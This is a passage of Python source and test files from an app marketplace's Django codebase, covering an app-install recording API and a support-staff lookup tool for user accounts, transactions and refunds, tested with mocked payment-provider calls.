'options': AllowAny, # Needed for CORS.
'get': AllowAuthor,
'post': AllowAuthor,
'put': AllowAuthor,
})]
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
def destroy(self):
raise NotImplemented('destroy is not allowed')
def pre_save(self, in_app_product):
in_app_product.webapp = self.get_app()
def get_queryset(self):
return InAppProduct.objects.filter(webapp=self.get_app())
def get_app(self):
if not hasattr(self, 'app'):
app_slug = self.kwargs['app_slug']
self.app = get_object_or_404(Webapp, app_slug=app_slug)
return self.app
def get_authors(self):
return self.get_app().authors.all()
########NEW FILE########
__FILENAME__ = forms
from django import forms
import happyforms
from mkt.api.forms import SluggableModelChoiceField
from mkt.webapps.models import Webapp
class InstallForm(happyforms.Form):
app = SluggableModelChoiceField(queryset=Webapp.objects.all(),
sluggable_to_field_name='app_slug')
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(InstallForm, self).__init__(*args, **kwargs)
def clean_app(self):
app = self.cleaned_data['app']
if app.is_premium():
raise forms.ValidationError('Use the receipt API for paid apps.')
return app
########NEW FILE########
__FILENAME__ = test_views
import json
from django.core.urlresolvers import reverse
from mock import ANY, patch
from nose.tools import eq_
import amo
from addons.models import Addon, AddonUser
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed
from mkt.constants.apps import INSTALL_TYPE_DEVELOPER, INSTALL_TYPE_USER
class TestAPI(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestAPI, self).setUp()
self.addon = Addon.objects.get(pk=337141)
self.url = reverse('app-install-list')
self.data = json.dumps({'app': self.addon.pk})
self.profile = self.user
def test_has_cors(self):
self.assertCORS(self.client.post(self.url), 'post')
def post(self, anon=False):
client = self.anon if anon else self.client
return client.post(self.url, data=self.data)
def test_no_app(self):
self.data = json.dumps({'app': 0})
eq_(self.post().status_code, 400)
def test_not_public(self):
self.addon.update(status=amo.STATUS_DISABLED)
self.data = json.dumps({'app': self.addon.app_slug})
eq_(self.post().status_code, 403)
def test_not_paid(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.data = json.dumps({'app': self.addon.app_slug})
eq_(self.post().status_code, 400)
def test_app_slug(self):
self.data = json.dumps({'app': self.addon.app_slug})
eq_(self.post().status_code, 201)
eq_(self.profile.reload().installed_set.all()[0].addon, self.addon)
def test_app_pk(self):
self.data = json.dumps({'app': self.addon.pk})
eq_(self.post().status_code, 201)
eq_(self.profile.reload().installed_set.all()[0].addon, self.addon)
@patch('mkt.installs.utils.record_action')
def test_logged(self, record_action):
self.data = json.dumps({'app': self.addon.pk})
eq_(self.post().status_code, 201)
record_action.assert_called_with('install', ANY,
{'app-domain': u'http://micropipes.com', 'app-id': 337141L,
'region': 'restofworld', 'anonymous': False})
@patch('mkt.installs.utils.record_action')
def test_logged_anon(self, record_action):
self.data = json.dumps({'app': self.addon.pk})
eq_(self.post(anon=True).status_code, 201)
record_action.assert_called_with('install', ANY,
{'app-domain': u'http://micropipes.com', 'app-id': 337141L,
'region': 'restofworld', 'anonymous': True})
@patch('mkt.installs.utils.record_action')
def test_app_install_twice(self, record_action):
Installed.objects.create(user=self.profile, addon=self.addon,
install_type=INSTALL_TYPE_USER)
eq_(self.post().status_code, 202)
def test_app_install_developer(self):
AddonUser.objects.create(addon=self.addon, user=self.profile)
self.data = json.dumps({'app': self.addon.app_slug})
eq_(self.post().status_code, 201)
eq_(self.profile.reload().installed_set.all()[0].install_type,
INSTALL_TYPE_DEVELOPER)
def test_app_install_developer_not_public(self):
self.addon.update(status=amo.STATUS_DISABLED)
self.test_app_install_developer()
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from mkt.installs.views import install
urlpatterns = patterns('',
url(r'^installs/record/', install, name='app-install-list')
)
########NEW FILE########
__FILENAME__ = utils
import amo
from access.acl import check_ownership
from lib.metrics import record_action
from mkt.constants.apps import INSTALL_TYPE_DEVELOPER, INSTALL_TYPE_USER
def install_type(request, app):
if check_ownership(request, app, require_owner=False,
ignore_disabled=True, admin=False):
return INSTALL_TYPE_DEVELOPER
return INSTALL_TYPE_USER
def record(request, app):
amo.log(amo.LOG.INSTALL_ADDON, app)
domain = app.domain_from_url(app.origin, allow_none=True)
record_action('install', request, {
'app-domain': domain,
'app-id': app.pk,
'region': request.REGION.slug,
'anonymous': request.user.is_anonymous(),
})
########NEW FILE########
__FILENAME__ = views
from django.core.exceptions import PermissionDenied
import commonware.log
from rest_framework.decorators import (authentication_classes,
parser_classes, permission_classes)
from rest_framework.parsers import FormParser, JSONParser
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import cors_api_view
from mkt.constants.apps import INSTALL_TYPE_USER
from mkt.installs.forms import InstallForm
from mkt.installs.utils import install_type, record
from mkt.webapps.models import Installed
log = commonware.log.getLogger('z.api')
@cors_api_view(['POST'])
@authentication_classes([RestOAuthAuthentication,
RestSharedSecretAuthentication])
@parser_classes([JSONParser, FormParser])
@permission_classes([AllowAny])
def install(request):
form = InstallForm(request.DATA, request=request)
if form.is_valid():
app = form.cleaned_data['app']
type_ = install_type(request, app)
# Users can't install non-public apps. Developers can though.
if not app.is_public() and type_ == INSTALL_TYPE_USER:
log.info('App not public: {0}'.format(app.pk))
raise PermissionDenied
if not request.amo_user:
record(request, app)
else:
installed, created = Installed.objects.get_or_create(
addon=app, user=request.amo_user, install_type=type_)
record(request, app)
if not created:
return Response(status=202)
return Response(status=201)
return Response(status=400)
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.conf import settings
import happyforms
from tower import ugettext_lazy as _lazy
class TransactionSearchForm(happyforms.Form):
q = forms.CharField(label=_lazy(u'Transaction Lookup'))
label_suffix = ''
class TransactionRefundForm(happyforms.Form):
# A manual refund is one that does not use the payment providers API
# but has been processed manually.
manual = forms.BooleanField(
label=_lazy(u'Process a manual refund'),
required=False)
refund_reason = forms.CharField(
label=_lazy(u'Enter refund details to refund transaction'),
widget=forms.Textarea(attrs={'rows': 4}))
fake = forms.ChoiceField(
choices=(('OK', 'OK'), ('PENDING', 'Pending'), ('INVALID', 'Invalid')))
def __init__(self, *args, **kw):
super(TransactionRefundForm, self).__init__(*args, **kw)
if not settings.BANGO_FAKE_REFUNDS:
del self.fields['fake']
class DeleteUserForm(happyforms.Form):
delete_reason = forms.CharField(
label=_lazy(u'Reason for Deletion'),
widget=forms.Textarea(attrs={'rows': 2}))
########NEW FILE########
__FILENAME__ = helpers
from jingo import env, register
import jinja2
from access import acl
@register.filter
@jinja2.contextfilter
def format_currencies(context, currencies):
cs = ', '.join(['%s %.2f' % (code, amount)
for code, amount in currencies.items()
if amount > 0.0])
if cs:
cs = '(%s)' % cs
return jinja2.Markup(cs)
# page_type is used for setting the link 'sel' class (activity/purchases)
@register.function
def user_header(account, title, is_admin=False, page_type=''):
t = env.get_template('lookup/helpers/user_header.html')
return jinja2.Markup(t.render({'account': account, 'is_admin': is_admin,
'title': title, 'page_type': page_type}))
# page_type is used for setting the link 'sel' class
@register.function
@jinja2.contextfunction
def app_header(context, app, page_type=''):
t = env.get_template('lookup/helpers/app_header.html')
is_author = acl.check_ownership(context['request'], app)
is_operator = any(g.name == 'Operators' for g in context['request'].groups)
is_admin = acl.action_allowed(context['request'], 'Users', 'Edit')
is_staff = acl.action_allowed(context['request'], 'Apps', 'Configure')
is_reviewer = acl.check_reviewer(context['request'])
return jinja2.Markup(t.render({'app': app, 'page_type': page_type,
'is_admin': is_admin, 'is_staff': is_staff,
'is_reviewer': is_reviewer,
'is_author': is_author,
'is_operator': is_operator}))
@register.function
@jinja2.contextfunction
def is_operator(context):
return any(g.name == 'Operators' for g in context['request'].groups)
########NEW FILE########
__FILENAME__ = models
########NEW FILE########
__FILENAME__ = tasks
from amo.utils import send_mail_jinja
from celeryutils import task
@task
def email_buyer_refund_pending(contrib):
send_mail_jinja('Your refund request for %s is now being processed'
% contrib.addon.name,
'lookup/emails/refund-pending.txt',
{'name': contrib.addon.name},
recipient_list=[contrib.user.email]),
@task
def email_buyer_refund_approved(contrib):
send_mail_jinja('Your refund request for %s has been approved!'
% contrib.addon.name,
'lookup/emails/refund-approved.txt',
{'name': contrib.addon.name},
recipient_list=[contrib.user.email]),
########NEW FILE########
__FILENAME__ = test_forms
from nose.tools import eq_
import amo.tests
from mkt.lookup.forms import TransactionSearchForm, TransactionRefundForm
class TestTransactionSearchForm(amo.tests.TestCase):
def test_basic(self):
"""Test the form doesn't crap out."""
self.check_valid({'q': 12345}, True)
def test_str_number(self):
self.check_valid({'q': '12345'})
def check_valid(self, data, valid=True):
form = TransactionSearchForm(data)
eq_(form.is_valid(), valid)
class TestTransactionRefundForm(amo.tests.TestCase):
def test_not_fake(self):
with self.settings(BANGO_FAKE_REFUNDS=False):
assert 'fake' not in TransactionRefundForm().fields.keys()
def test_fake(self):
with self.settings(BANGO_FAKE_REFUNDS=True):
assert 'fake' in TransactionRefundForm().fields.keys()
########NEW FILE########
__FILENAME__ = test_views
import json
from datetime import datetime, timedelta
from decimal import Decimal
from django.conf import settings
from django.contrib.messages.storage.fallback import FallbackStorage
from django.core import mail
from django.core.urlresolvers import reverse
from django.test.client import RequestFactory
from django.utils.encoding import smart_str
import mock
from babel import numbers
from curling.lib import HttpClientError
from nose.exc import SkipTest
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from slumber import exceptions
import amo
import amo.tests
from abuse.models import AbuseReport
from access.models import Group, GroupUser
from addons.models import Addon, AddonUser
from amo.tests import (addon_factory, app_factory, ESTestCase,
req_factory_factory, TestCase)
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from devhub.models import ActivityLog
from mkt.constants.payments import COMPLETED, FAILED, PENDING, REFUND_STATUSES
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.developers.providers import get_provider
from mkt.developers.tests.test_views_payments import (setup_payment_account,
TEST_PACKAGE_ID)
from mkt.lookup.views import (_transaction_summary, app_summary,
transaction_refund, user_delete, user_summary)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import AddonPaymentData, Refund
from stats.models import Contribution
from users.models import UserProfile
class SummaryTest(TestCase):
def add_payment_accounts(self, providers, app=None):
if not app:
app = self.app
user = self.user
seller = SolitudeSeller.objects.create(user=user, uuid='seller-uid')
for provider in providers:
uri = 'seller-{p}'.format(p=provider)
payment = PaymentAccount.objects.create(
user=user, solitude_seller=seller,
provider=provider,
seller_uri=uri, uri=uri,
agreed_tos=True, account_id='not-important')
AddonPaymentAccount.objects.create(addon=app,
product_uri='product-{p}'.format(p=provider),
account_uri=payment.uri,
payment_account=payment)
app.save()
def verify_bango_boku_portals(self, app, response):
bango = pq(response.content)('[data-provider-name=bango]')
heading = pq('dt', bango).text()
assert 'Bango' in heading, heading
assert unicode(app.name) in heading, heading
eq_(pq('dd a', bango).attr('href'),
get_provider(name='bango').get_portal_url(app.app_slug))
boku = pq(response.content)('[data-provider-name=boku]')
heading = pq('dt', boku).text()
assert 'Boku' in heading, heading
assert unicode(app.name) in heading, heading
eq_(pq('dd a', boku).attr('href'),
get_provider(name='boku').get_portal_url(app.app_slug))
@mock.patch.object(settings, 'TASK_USER_ID', 999)
class TestAcctSummary(SummaryTest):
fixtures = fixture('user_support_staff', 'user_999', 'webapp_337141',
'user_operator')
def setUp(self):
super(TestAcctSummary, self).setUp()
self.user = UserProfile.objects.get(username='31337') # steamcube
self.steamcube = Addon.objects.get(pk=337141)
self.otherapp = app_factory(app_slug='otherapp')
self.reg_user = UserProfile.objects.get(email='[email protected]')
self.summary_url = reverse('lookup.user_summary', args=[self.user.pk])
self.login(UserProfile.objects.get(username='support_staff'))
def buy_stuff(self, contrib_type):
for i in range(3):
if i == 1:
curr = 'GBR'
else:
curr = 'USD'
amount = Decimal('2.00')
Contribution.objects.create(addon=self.steamcube,
type=contrib_type,
currency=curr,
amount=amount,
user_id=self.user.pk)
def summary(self, expected_status=200):
res = self.client.get(self.summary_url)
eq_(res.status_code, expected_status)
return res
def payment_data(self):
return {'full_name': 'Ed Peabody Jr.',
'business_name': 'Mr. Peabody',
'phone': '(1) 773-111-2222',
'address_one': '1111 W Leland Ave',
'address_two': 'Apt 1W',
'city': 'Chicago',
'post_code': '60640',
'country': 'USA',
'state': 'Illinois'}
def test_home_auth(self):
self.client.logout()
res = self.client.get(reverse('lookup.home'))
self.assertLoginRedirects(res, reverse('lookup.home'))
def test_summary_auth(self):
self.client.logout()
res = self.client.get(self.summary_url)
self.assertLoginRedirects(res, self.summary_url)
def test_home(self):
res = self.client.get(reverse('lookup.home'))
self.assertNoFormErrors(res)
eq_(res.status_code, 200)
def test_basic_summary(self):
res = self.summary()
eq_(res.context['account'].pk, self.user.pk)
@mock.patch.object(settings, 'PAYMENT_PROVIDERS', ['bango', 'boku'])
def test_multiple_payment_accounts(self):
app = self.steamcube
self.add_payment_accounts([PROVIDER_BANGO, PROVIDER_BOKU],
app=app)
res = self.summary()
self.verify_bango_boku_portals(app, res)
def test_app_counts(self):
self.buy_stuff(amo.CONTRIB_PURCHASE)
sm = self.summary().context['app_summary']
eq_(sm['app_total'], 3)
eq_(sm['app_amount']['USD'], 4.0)
eq_(sm['app_amount']['GBR'], 2.0)
def test_requested_refunds(self):
contrib = Contribution.objects.create(type=amo.CONTRIB_PURCHASE,
user_id=self.user.pk,
addon=self.steamcube,
currency='USD',
amount='0.99')
Refund.objects.create(contribution=contrib, user=self.user)
res = self.summary()
eq_(res.context['refund_summary']['requested'], 1)
eq_(res.context['refund_summary']['approved'], 0)
def test_approved_refunds(self):
contrib = Contribution.objects.create(type=amo.CONTRIB_PURCHASE,
user_id=self.user.pk,
addon=self.steamcube,
currency='USD',
amount='0.99')
Refund.objects.create(contribution=contrib,
status=amo.REFUND_APPROVED_INSTANT,
user=self.user)
res = self.summary()
eq_(res.context['refund_summary']['requested'], 1)
eq_(res.context['refund_summary']['approved'], 1)
def test_app_created(self):
res = self.summary()
# Number of apps/add-ons belonging to this user.
eq_(len(res.context['user_addons']), 1)
def test_paypal_ids(self):
self.user.addons.update(paypal_id='[email protected]')
res = self.summary()
eq_(list(res.context['paypal_ids']), [u'[email protected]'])
def test_no_paypal(self):
self.user.addons.update(paypal_id='')
res = self.summary()
eq_(list(res.context['paypal_ids']), [])
def test_payment_data(self):
payment_data = self.payment_data()
AddonPaymentData.objects.create(addon=self.steamcube,
**payment_data)
res = self.summary()
pd = res.context['payment_data'][0]
for key, value in payment_data.iteritems():
eq_(pd[key], value)
def test_no_payment_data(self):
res = self.summary()
eq_(len(res.context['payment_data']), 0)
def test_no_duplicate_payment_data(self):
role = AddonUser.objects.create(user=self.user,
addon=self.otherapp,
role=amo.AUTHOR_ROLE_DEV)
self.otherapp.addonuser_set.add(role)
payment_data = self.payment_data()
AddonPaymentData.objects.create(addon=self.steamcube,
**payment_data)
AddonPaymentData.objects.create(addon=self.otherapp,
**payment_data)
res = self.summary()
eq_(len(res.context['payment_data']), 1)
pd = res.context['payment_data'][0]
for key, value in payment_data.iteritems():
eq_(pd[key], value)
def test_operator_app_lookup_only(self):
GroupUser.objects.create(
group=Group.objects.get(name='Operators'),
user=UserProfile.objects.get(username='support_staff'))
res = self.client.get(reverse('lookup.home'))
doc = pq(res.content)
eq_(doc('#app-search-form select').length, 0)
def test_delete_user(self):
staff = UserProfile.objects.get(username='support_staff')
req = req_factory_factory(
reverse('lookup.user_delete', args=[self.user.id]), user=staff,
post=True, data={'delete_reason': 'basketball reasons'})
r = user_delete(req, self.user.id)
self.assert3xx(r, reverse('lookup.user_summary', args=[self.user.id]))
# Test data.
assert UserProfile.objects.get(id=self.user.id).deleted
eq_(staff, ActivityLog.objects.for_user(self.user).filter(
action=amo.LOG.DELETE_USER_LOOKUP.id)[0].user)
# Test frontend.
req = req_factory_factory(
reverse('lookup.user_summary', args=[self.user.id]), user=staff)
r = user_summary(req, self.user.id)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('#delete-user dd:eq(1)').text(), 'basketball reasons')
class TestBangoRedirect(TestCase):
fixtures = fixture('user_support_staff', 'user_999', 'webapp_337141',
'user_operator')
def setUp(self):
super(TestBangoRedirect, self).setUp()
self.user = UserProfile.objects.get(username='31337') # steamcube
self.steamcube = Addon.objects.get(pk=337141)
self.otherapp = app_factory(app_slug='otherapp')
self.reg_user = UserProfile.objects.get(email='[email protected]')
self.summary_url = reverse('lookup.user_summary', args=[self.user.pk])
self.login(UserProfile.objects.get(username='support_staff'))
self.steamcube.update(premium_type=amo.ADDON_PREMIUM)
self.account = setup_payment_account(self.steamcube, self.user)
self.portal_url = reverse('lookup.bango_portal_from_package',
args=[self.account.payment_account.account_id])
self.authentication_token = u'D0A44686-D4A3-4B2F-9BEB-5E4975E35192'
@mock.patch('mkt.developers.views_payments.client.api')
def test_bango_portal_redirect(self, api):
api.bango.login.post.return_value = {
'person_id': 600925,
'email_address': u'[email protected]',
'authentication_token': self.authentication_token,
}
res = self.client.get(self.portal_url)
eq_(res.status_code, 302)
eq_(api.bango.login.post.call_args[0][0]['packageId'],
int(TEST_PACKAGE_ID))
redirect_url = res['Location']
assert self.authentication_token in redirect_url, redirect_url
assert 'emailAddress=admin%40place.com' in redirect_url, redirect_url
@mock.patch('mkt.developers.views_payments.client.api')
def test_bango_portal_redirect_api_error(self, api):
message = 'Something went wrong.'
error = {'__all__': [message]}
api.bango.login.post.side_effect = HttpClientError(content=error)
res = self.client.get(self.portal_url, follow=True)
eq_(res.redirect_chain, [('http://testserver/lookup/', 302)])
ok_(message in [msg.message for msg in res.context['messages']][0])
@mock.patch('mkt.developers.views_payments.client.api')
def test_bango_portal_redirect_role_error(self, api):
self.login(self.user)
res = self.client.get(self.portal_url)
eq_(res.status_code, 403)
class SearchTestMixin(object):
def search(self, expect_results=True, **data):
res = self.client.get(self.url, data)
data = json.loads(res.content)
if expect_results:
assert len(data['results']), 'should be more than 0 results'
return data
def test_auth_required(self):
self.client.logout()
res = self.client.get(self.url)
self.assertLoginRedirects(res, self.url)
class TestAcctSearch(TestCase, SearchTestMixin):
fixtures = fixture('user_10482', 'user_support_staff', 'user_operator')
def setUp(self):
super(TestAcctSearch, self).setUp()
self.url = reverse('lookup.user_search')
self.user = UserProfile.objects.get(username='clouserw')
self.login(UserProfile.objects.get(username='support_staff'))
def verify_result(self, data):
eq_(data['results'][0]['name'], self.user.username)
eq_(data['results'][0]['display_name'], self.user.display_name)
eq_(data['results'][0]['email'], self.user.email)
eq_(data['results'][0]['id'], self.user.pk)
eq_(data['results'][0]['url'], reverse('lookup.user_summary',
args=[self.user.pk]))
def test_by_username(self):
self.user.update(username='newusername')
data = self.search(q='newus')
self.verify_result(data)
def test_by_username_with_dashes(self):
self.user.update(username='kr-raj')
data = self.search(q='kr-raj')
self.verify_result(data)
def test_by_display_name(self):
self.user.update(display_name='Kumar McMillan')
data = self.search(q='mcmill')
self.verify_result(data)
def test_by_id(self):
data = self.search(q=self.user.pk)
self.verify_result(data)
def test_by_email(self):
self.user.update(email='[email protected]')
data = self.search(q='fonzi')
self.verify_result(data)
@mock.patch('mkt.constants.lookup.SEARCH_LIMIT', 2)
@mock.patch('mkt.constants.lookup.MAX_RESULTS', 3)
def test_all_results(self):
for x in range(4):
name = 'chr' + str(x)
UserProfile.objects.create(username=name, name=name,
email=name + '@gmail.com')
# Test not at search limit.
data = self.search(q='clouserw')
eq_(len(data['results']), 1)
# Test search limit.
data = self.search(q='chr')
eq_(len(data['results']), 2)
# Test maximum search result.
data = self.search(q='chr', all_results=True)
eq_(len(data['results']), 3)
class TestTransactionSearch(TestCase):
fixtures = fixture('user_support_staff', 'user_999', 'user_operator')
def setUp(self):
self.uuid = 45
self.url = reverse('lookup.transaction_search')
self.client.login(username='[email protected]',
password='password')
def test_redirect(self):
r = self.client.get(self.url, {'q': self.uuid})
self.assert3xx(r, reverse('lookup.transaction_summary',
args=[self.uuid]))
def test_no_perm(self):
self.client.login(username='[email protected]',
password='password')
r = self.client.get(self.url, {'q': self.uuid})
eq_(r.status_code, 403)
assert self.client.login(username='[email protected]',
password='password')
r = self.client.get(self.url, {'q': self.uuid})
eq_(r.status_code, 403)
#@mock.patch.object(settings, 'TASK_USER_ID', 999)
class TestTransactionSummary(TestCase):
fixtures = fixture('user_support_staff', 'user_999', 'user_operator')
def setUp(self):
self.uuid = 'some:uuid'
self.transaction_id = 'some:tr'
self.seller_uuid = 456
self.related_tx_uuid = 789
self.user = UserProfile.objects.get(pk=999)
self.app = addon_factory(type=amo.ADDON_WEBAPP)
self.contrib = Contribution.objects.create(
addon=self.app, uuid=self.uuid, user=self.user,
transaction_id=self.transaction_id)
self.url = reverse('lookup.transaction_summary', args=[self.uuid])
self.client.login(username='[email protected]',
password='password')
@mock.patch.object(settings, 'TASK_USER_ID', 999)
def create_test_refund(self):
refund_contrib = Contribution.objects.create(
addon=self.app, related=self.contrib, type=amo.CONTRIB_REFUND,
transaction_id='testtransactionid', user=self.user)
refund_contrib.enqueue_refund(amo.REFUND_PENDING, self.user)
def test_transaction_summary(self):
data = _transaction_summary(self.uuid)
eq_(data['is_refundable'], False)
eq_(data['contrib'].pk, self.contrib.pk)
@mock.patch('mkt.lookup.views.client')
def test_refund_status(self, solitude):
solitude.api.bango.refund.status.get.return_value = {'status': PENDING}
self.create_test_refund()
data = _transaction_summary(self.uuid)
eq_(data['refund_status'], REFUND_STATUSES[PENDING])
@mock.patch('mkt.lookup.views.client')
def test_is_refundable(self, solitude):
solitude.api.bango.refund.status.get.return_value = {'status': PENDING}
self.contrib.update(type=amo.CONTRIB_PURCHASE)
data = _transaction_summary(self.uuid)
eq_(data['contrib'].pk, self.contrib.pk)
eq_(data['is_refundable'], True)
self.create_test_refund()
data = _transaction_summary(self.uuid)
eq_(data['is_refundable'], False)
@mock.patch('mkt.lookup.views.client')
def test_200(self, solitude):
r = self.client.get(self.url)
eq_(r.status_code, 200)
def test_no_perm_403(self):
self.client.login(username='[email protected]',
password='password')
r = self.client.get(self.url)
eq_(r.status_code, 403)
assert self.client.login(username='[email protected]',
password='password')
r = self.client.get(self.url)
eq_(r.status_code, 403)
def test_no_transaction_404(self):
r = self.client.get(reverse('lookup.transaction_summary', args=[999]))
eq_(r.status_code, 404)
@mock.patch.object(settings, 'TASK_USER_ID', 999)
class TestTransactionRefund(TestCase):
fixtures = fixture('user_support_staff', 'user_999')
def setUp(self):
self.uuid = 'paymentuuid'
self.refund_uuid = 'refunduuid'
self.summary_url = reverse('lookup.transaction_summary',
args=[self.uuid])
self.url = reverse('lookup.transaction_refund', args=[self.uuid])
self.app = app_factory()
self.user = UserProfile.objects.get(username='regularuser')
AddonUser.objects.create(addon=self.app, user=self.user)
self.req = self.request({'refund_reason': 'text'})
self.contrib = Contribution.objects.create(
addon=self.app, user=self.user, uuid=self.uuid,
type=amo.CONTRIB_PURCHASE, amount=1, transaction_id='123')
# Fix Django 1.4 RequestFactory bug with MessageMiddleware.
setattr(self.req, 'session', 'session')
messages = FallbackStorage(self.req)
setattr(self.req, '_messages', messages)
self.login(self.req.user)
def bango_ret(self, status):
return {
'status': status,
'transaction': 'transaction_uri',
'uuid': 'some:uid'
}
def request(self, data):
req = RequestFactory().post(self.url, data)
req.user = req.amo_user = UserProfile.objects.get(
username='support_staff')
req.groups = req.amo_user.groups.all()
return req
def refund_tx_ret(self):
return {'uuid': self.refund_uuid}
@mock.patch('mkt.lookup.views.client')
def test_fake_refund_ignored(self, client):
req = self.request({'refund_reason': 'text', 'fake': 'OK'})
with self.settings(BANGO_FAKE_REFUNDS=False):
transaction_refund(req, self.uuid)
client.api.bango.refund.post.assert_called_with(
{'uuid': '123', 'manual': False})
@mock.patch('mkt.lookup.views.client')
def test_manual_refund(self, client):
req = self.request({'refund_reason': 'text', 'manual': True})
transaction_refund(req, self.uuid)
client.api.bango.refund.post.assert_called_with(
{'uuid': '123', 'manual': True})
@mock.patch('mkt.lookup.views.client')
def test_fake_refund(self, client):
req = self.request({'refund_reason': 'text', 'fake': 'OK'})
with self.settings(BANGO_FAKE_REFUNDS=True):
transaction_refund(req, self.uuid)
client.api.bango.refund.post.assert_called_with({
'fake_response_status': {'responseCode': 'OK'},
'uuid': '123', 'manual': False})
@mock.patch('mkt.lookup.views.client')
def test_refund_success(self, solitude):
solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
solitude.get.return_value = self.refund_tx_ret()
# Do refund.
res = transaction_refund(self.req, self.uuid)
refund = Refund.objects.filter(contribution__addon=self.app)
refund_contribs = self.contrib.get_refund_contribs()
# Check Refund created.
assert refund.exists()
eq_(refund[0].status, amo.REFUND_PENDING)
assert self.req.POST['refund_reason'] in refund[0].refund_reason
# Check refund Contribution created.
eq_(refund_contribs.exists(), True)
eq_(refund_contribs[0].refund, refund[0])
eq_(refund_contribs[0].related, self.contrib)
eq_(refund_contribs[0].amount, -self.contrib.amount)
self.assert3xx(res, self.summary_url)
@mock.patch('mkt.lookup.views.client')
def test_refund_failed(self, solitude):
solitude.api.bango.refund.post.return_value = self.bango_ret(FAILED)
res = transaction_refund(self.req, self.uuid)
# Check no refund Contributions created.
assert not self.contrib.get_refund_contribs().exists()
self.assert3xx(res, self.summary_url)
def test_cant_refund(self):
self.contrib.update(type=amo.CONTRIB_PENDING)
resp = self.client.post(self.url, {'refund_reason': 'text'})
eq_(resp.status_code, 404)
@mock.patch('mkt.lookup.views.client')
def test_already_refunded(self, solitude):
solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
solitude.get.return_value = self.refund_tx_ret()
res = transaction_refund(self.req, self.uuid)
refund_count = Contribution.objects.all().count()
# Check no refund Contributions created.
res = self.client.post(self.url, {'refund_reason': 'text'})
assert refund_count == Contribution.objects.all().count()
self.assert3xx(res, reverse('lookup.transaction_summary',
args=[self.uuid]))
@mock.patch('mkt.lookup.views.client')
def test_refund_slumber_error(self, solitude):
for exception in (exceptions.HttpClientError,
exceptions.HttpServerError):
solitude.api.bango.refund.post.side_effect = exception
res = transaction_refund(self.req, self.uuid)
# Check no refund Contributions created.
assert not self.contrib.get_refund_contribs().exists()
self.assert3xx(res, self.summary_url)
@mock.patch('mkt.lookup.views.client')
def test_redirect(self, solitude):
solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
solitude.get.return_value = self.refund_tx_ret()
res = self.client.post(self.url, {'refund_reason': 'text'})
self.assert3xx(res, reverse('lookup.transaction_summary',
args=[self.uuid]))
@mock.patch('mkt.lookup.views.client')
@mock.patch.object(settings, 'SEND_REAL_EMAIL', True)
def test_refund_pending_email(self, solitude):
solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
solitude.get.return_value = self.refund_tx_ret()
transaction_refund(self.req, self.uuid)
eq_(len(mail.outbox), 1)
assert self.app.name.localized_string in smart_str(mail.outbox[0].body)
@mock.patch('mkt.lookup.views.client')
@mock.patch.object(settings, 'SEND_REAL_EMAIL', True)
def test_refund_completed_email(self, solitude):
solitude.api.bango.refund.post.return_value = self.bango_ret(COMPLETED)
solitude.get.return_value = self.refund_tx_ret()
transaction_refund(self.req, self.uuid)
eq_(len(mail.outbox), 1)
assert self.app.name.localized_string in smart_str(mail.outbox[0].body)
@mock.patch('mkt.lookup.views.client')
def test_403_reg_user(self, solitude):
solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
solitude.get.return_value = self.refund_tx_ret()
self.login(self.user)
res = self.client.post(self.url, {'refund_reason': 'text'})
eq_(res.status_code, 403)
class TestAppSearch(ESTestCase, SearchTestMixin):
fixtures = fixture('user_support_staff', 'user_999', 'webapp_337141',
'user_operator')
def setUp(self):
super(TestAppSearch, self).setUp()
self.url = reverse('lookup.app_search')
self.app = Addon.objects.get(pk=337141)
assert self.client.login(username='[email protected]',
password='password')
def verify_result(self, data):
eq_(data['results'][0]['name'], self.app.name.localized_string)
eq_(data['results'][0]['id'], self.app.pk)
eq_(data['results'][0]['url'], reverse('lookup.app_summary',
args=[self.app.pk]))
def test_by_name_part(self):
self.app.name = 'This is Steamcube'
self.app.save()
self.refresh('webapp')
data = self.search(q='steamcube')
self.verify_result(data)
def test_by_name_unreviewed(self):
# Just the same as the above test, but with an unreviewed app.
self.app.status = amo.STATUS_UNREVIEWED
self.test_by_name_part()
def test_by_deleted_app(self):
self.app.delete()
self.refresh('webapp')
data = self.search(q='something')
self.verify_result(data)
def test_multiword(self):
self.app.name = 'Firefox Marketplace'
self.app.save()
self.refresh('webapp')
data = self.search(q='Firefox Marketplace')
self.verify_result(data)
def test_by_stem_name(self):
self.app.name = 'Instigated'
self.app.save()
self.refresh('webapp')
data = self.search(q='instigate')
self.verify_result(data)
def test_by_guid(self):
self.app.update(guid='abcdef')
data = self.search(q=self.app.guid)
self.verify_result(data)
def test_by_id(self):
data = self.search(q=self.app.pk)
self.verify_result(data)
def test_operator(self):
assert self.client.login(username='[email protected]',
password='password')
data = self.search(q=self.app.pk)
self.verify_result(data)
@mock.patch('mkt.constants.lookup.SEARCH_LIMIT', 2)
@mock.patch('mkt.constants.lookup.MAX_RESULTS', 3)
def test_all_results(self):
for x in range(4):
addon_factory(name='chr' + str(x), type=amo.ADDON_WEBAPP)
self.refresh('webapp')
# Test search limit.
data = self.search(q='chr')
eq_(len(data['results']), 2)
# Test maximum search result.
data = self.search(q='chr', all_results=True)
eq_(len(data['results']), 3)
class AppSummaryTest(SummaryTest):
fixtures = fixture('prices', 'webapp_337141', 'user_support_staff')
def _setUp(self):
self.app = Addon.objects.get(pk=337141)
self.url = reverse('lookup.app_summary',
args=[self.app.pk])
